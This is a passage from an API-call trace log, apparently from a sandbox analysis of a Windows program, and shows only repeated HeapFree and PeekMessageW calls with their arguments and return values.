lpMem=0x17ce468 | out: hHeap=0x1780000) returned 1 [0073.066] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360520 | out: hHeap=0x1780000) returned 1 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43604d8 | out: hHeap=0x1780000) returned 1 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce508 | out: hHeap=0x1780000) returned 1 [0073.066] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360478 | out: hHeap=0x1780000) returned 1 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360490 | out: hHeap=0x1780000) returned 1 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce568 | out: hHeap=0x1780000) returned 1 [0073.066] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360508 | out: hHeap=0x1780000) returned 1 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43604f0 | out: hHeap=0x1780000) returned 1 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce428 | out: hHeap=0x1780000) returned 1 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce498 | out: hHeap=0x1780000) returned 1 [0073.066] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43604c0 | out: hHeap=0x1780000) returned 1 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43604d8 | out: hHeap=0x1780000) returned 1 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce5b8 | out: hHeap=0x1780000) returned 1 [0073.066] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360520 | out: hHeap=0x1780000) returned 1 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43604f0 | out: hHeap=0x1780000) returned 1 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce588 | out: hHeap=0x1780000) returned 1 [0073.066] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43604f0 | out: hHeap=0x1780000) returned 1 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360508 | out: hHeap=0x1780000) returned 1 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce5c8 | out: hHeap=0x1780000) returned 1 [0073.066] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360508 | out: hHeap=0x1780000) returned 1 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360520 | out: hHeap=0x1780000) returned 1 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce458 | out: hHeap=0x1780000) returned 1 [0073.067] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360538 | out: hHeap=0x1780000) returned 1 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360538 | out: hHeap=0x1780000) returned 1 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce5c8 | out: hHeap=0x1780000) returned 1 [0073.067] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360538 | out: hHeap=0x1780000) returned 1 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360730 | out: hHeap=0x1780000) returned 1 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce548 | out: hHeap=0x1780000) returned 1 [0073.067] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43609d0 | out: hHeap=0x1780000) returned 1 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43608e0 | out: hHeap=0x1780000) returned 1 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce498 | out: hHeap=0x1780000) returned 1 [0073.067] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360808 | out: hHeap=0x1780000) returned 1 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43607f0 | out: hHeap=0x1780000) returned 1 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce5c8 | out: hHeap=0x1780000) returned 1 [0073.067] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360880 | out: hHeap=0x1780000) returned 1 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43606e8 | out: hHeap=0x1780000) returned 1 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce5c8 | out: hHeap=0x1780000) returned 1 [0073.067] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360820 | out: hHeap=0x1780000) returned 1 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43609a0 | out: hHeap=0x1780000) returned 1 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce558 | out: hHeap=0x1780000) returned 1 [0073.068] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360850 | out: hHeap=0x1780000) returned 1 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360898 | out: hHeap=0x1780000) returned 1 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce578 | out: hHeap=0x1780000) returned 1 [0073.068] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360718 | out: hHeap=0x1780000) returned 1 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43606e8 | out: hHeap=0x1780000) returned 1 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce538 | out: hHeap=0x1780000) returned 1 [0073.068] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360808 | out: hHeap=0x1780000) returned 1 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43607c0 | out: hHeap=0x1780000) returned 1 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce5c8 | out: hHeap=0x1780000) returned 1 [0073.068] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43606e8 | out: hHeap=0x1780000) returned 1 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360940 | out: hHeap=0x1780000) returned 1 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce468 | out: hHeap=0x1780000) returned 1 [0073.068] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360928 | out: hHeap=0x1780000) returned 1 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43607f0 | out: hHeap=0x1780000) returned 1 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce548 | out: hHeap=0x1780000) returned 1 [0073.068] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360808 | out: hHeap=0x1780000) returned 1 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43607f0 | out: hHeap=0x1780000) returned 1 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce548 | out: hHeap=0x1780000) returned 1 [0073.068] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360988 | out: hHeap=0x1780000) returned 1 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43609a0 | out: hHeap=0x1780000) returned 1 [0073.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce468 | out: hHeap=0x1780000) returned 1 [0073.068] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43608f8 | out: hHeap=0x1780000) returned 1 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360718 | out: hHeap=0x1780000) returned 1 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce408 | out: hHeap=0x1780000) returned 1 [0073.069] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43608f8 | out: hHeap=0x1780000) returned 1 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43607a8 | out: hHeap=0x1780000) returned 1 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce498 | out: hHeap=0x1780000) returned 1 [0073.069] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360898 | out: hHeap=0x1780000) returned 1 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43608f8 | out: hHeap=0x1780000) returned 1 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce568 | out: hHeap=0x1780000) returned 1 [0073.069] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360808 | out: hHeap=0x1780000) returned 1 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43607f0 | out: hHeap=0x1780000) returned 1 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360928 | out: hHeap=0x1780000) returned 1 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce578 | out: hHeap=0x1780000) returned 1 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce578 | out: hHeap=0x1780000) returned 1 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce578 | out: hHeap=0x1780000) returned 1 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360748 | out: hHeap=0x1780000) returned 1 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43607f0 | out: hHeap=0x1780000) returned 1 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x430c138 | out: hHeap=0x1780000) returned 1 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce498 | out: hHeap=0x1780000) returned 1 [0073.069] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360778 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43608f8 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce498 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce498 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce498 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360910 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360820 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43608f8 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x430bda0 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce408 | out: hHeap=0x1780000) returned 1 [0073.070] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360940 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360718 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce498 | out: hHeap=0x1780000) returned 1 [0073.070] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360718 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360718 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce6a8 | out: hHeap=0x1780000) returned 1 [0073.070] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360718 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360790 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce6b8 | out: hHeap=0x1780000) returned 1 [0073.070] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360910 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360730 | out: hHeap=0x1780000) returned 1 [0073.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce7b8 | out: hHeap=0x1780000) returned 1 [0073.071] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43607c0 | out: hHeap=0x1780000) returned 1 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360748 | out: hHeap=0x1780000) returned 1 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce5f8 | out: hHeap=0x1780000) returned 1 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce658 | out: hHeap=0x1780000) returned 1 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360730 | out: hHeap=0x1780000) returned 1 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360928 | out: hHeap=0x1780000) returned 1 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x430c0e8 | out: hHeap=0x1780000) returned 1 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce798 | out: hHeap=0x1780000) returned 1 [0073.071] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43607c0 | out: hHeap=0x1780000) returned 1 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360748 | out: hHeap=0x1780000) returned 1 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce688 | out: hHeap=0x1780000) returned 1 [0073.071] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360778 | out: hHeap=0x1780000) returned 1 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360748 | out: hHeap=0x1780000) returned 1 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce628 | out: hHeap=0x1780000) returned 1 [0073.071] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43607c0 | out: hHeap=0x1780000) returned 1 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360778 | out: hHeap=0x1780000) returned 1 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce7b8 | out: hHeap=0x1780000) returned 1 [0073.071] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360808 | out: hHeap=0x1780000) returned 1 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360808 | out: hHeap=0x1780000) returned 1 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce6b8 | out: hHeap=0x1780000) returned 1 [0073.071] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360748 | out: hHeap=0x1780000) returned 1 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360760 | out: hHeap=0x1780000) returned 1 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce778 | out: hHeap=0x1780000) returned 1 [0073.072] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360760 | out: hHeap=0x1780000) returned 1 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360778 | out: hHeap=0x1780000) returned 1 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce698 | out: hHeap=0x1780000) returned 1 [0073.072] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360790 | out: hHeap=0x1780000) returned 1 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43607a8 | out: hHeap=0x1780000) returned 1 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce728 | out: hHeap=0x1780000) returned 1 [0073.072] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360808 | out: hHeap=0x1780000) returned 1 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360808 | out: hHeap=0x1780000) returned 1 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce798 | out: hHeap=0x1780000) returned 1 [0073.072] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360a00 | out: hHeap=0x1780000) returned 1 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360c70 | out: hHeap=0x1780000) returned 1 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce608 | out: hHeap=0x1780000) returned 1 [0073.072] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360cb8 | out: hHeap=0x1780000) returned 1 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360b98 | out: hHeap=0x1780000) returned 1 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce5e8 | out: hHeap=0x1780000) returned 1 [0073.072] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360a30 | out: hHeap=0x1780000) returned 1 [0073.072] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.072] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 